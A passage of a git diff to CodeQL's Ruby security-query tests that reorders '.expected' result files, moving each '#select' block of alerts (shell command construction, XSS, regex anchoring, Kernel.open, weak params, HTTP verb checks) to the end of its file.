| Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | 
diff --git a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected index 6dd6637abd4d..4f72a24cee77 100644 --- a/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected +++ b/ruby/ql/test/query-tests/experimental/weak-params/WeakParams.expected 
@@ -1,8 +1,3 @@ -#select -| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | -| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | edges | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] 
| provenance | | | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | provenance | | 
@@ -18,3 +13,8 @@ nodes | WeakParams.rb:20:28:20:38 | call to GET | semmle.label | call to GET | | WeakParams.rb:20:28:20:44 | ...[...] | semmle.label | ...[...] | subpaths +#select +| WeakParams.rb:5:28:5:59 | ...[...] | WeakParams.rb:5:28:5:53 | call to request_parameters | WeakParams.rb:5:28:5:59 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:10:28:10:57 | ...[...] | WeakParams.rb:10:28:10:51 | call to query_parameters | WeakParams.rb:10:28:10:57 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:15:28:15:45 | ...[...] | WeakParams.rb:15:28:15:39 | call to POST | WeakParams.rb:15:28:15:45 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | +| WeakParams.rb:20:28:20:44 | ...[...] | WeakParams.rb:20:28:20:38 | call to GET | WeakParams.rb:20:28:20:44 | ...[...] | By exposing all keys in request parameters or by blindy accessing them, unintended parameters could be used and lead to mass-assignment or have other unexpected side-effects. 
It is safer to follow the 'strong parameters' pattern in Rails, which is outlined here: https://api.rubyonrails.org/classes/ActionController/StrongParameters.html | diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected index 94cdef1f29be..4032d044fd86 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/MissingFullAnchor.expected 
@@ -1,7 +1,3 @@ -#select -| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | -| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | edges | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | provenance | | | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | provenance | | 
@@ -14,3 +10,7 @@ nodes | impl/miss-anchor.rb:14:12:14:15 | name | semmle.label | name | | impl/miss-anchor.rb:15:47:15:50 | name | semmle.label | name | subpaths +#select +| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected index 25fd9e3e37a3..67e618a3a1fd 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected 
@@ -1,14 +1,3 @@ -#select -| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. 
| KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | edges | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:4:10:4:13 | file | provenance | | | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:5:13:5:16 | file | provenance | | 
@@ -39,3 +28,14 @@ nodes | KernelOpen.rb:13:23:13:26 | file | semmle.label | file | | KernelOpen.rb:26:10:26:13 | file | semmle.label | file | subpaths +#select +| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. 
| KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index adefbb03c645..622777da09ea 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected 
@@ -1,19 +1,3 @@ -#select -| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | -| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | -| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | -| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | -| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | -| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | -| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | -| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | -| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | -| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | -| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | edges | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | provenance | | | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | provenance | | 
@@ -64,3 +48,19 @@ nodes | impl/unsafeShell.rb:64:14:64:16 | arr | semmle.label | arr | | impl/unsafeShell.rb:68:14:68:16 | arr | semmle.label | arr | subpaths +#select +| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | +| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | +| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | +| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | +| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | +| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | +| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | +| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | +| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | +| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | +| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | diff --git a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected index 3b304c94586e..599f29e806c9 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected @@ -1,8 +1,3 @@ -#select -| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

    #{...}

    " | cross-site scripting | -| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | -| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | -| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

    #{...}

    " | cross-site scripting | edges | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | provenance | | | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | provenance | | @@ -18,3 +13,8 @@ nodes | lib/unsafeHtml.rb:23:32:23:35 | name | semmle.label | name | | lib/unsafeHtml.rb:24:10:24:16 | #{...} | semmle.label | #{...} | subpaths +#select +| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

    #{...}

    " | cross-site scripting | +| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | +| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | +| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

    #{...}

    " | cross-site scripting | diff --git a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected index f1c2646afce8..069cb34810fc 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected 
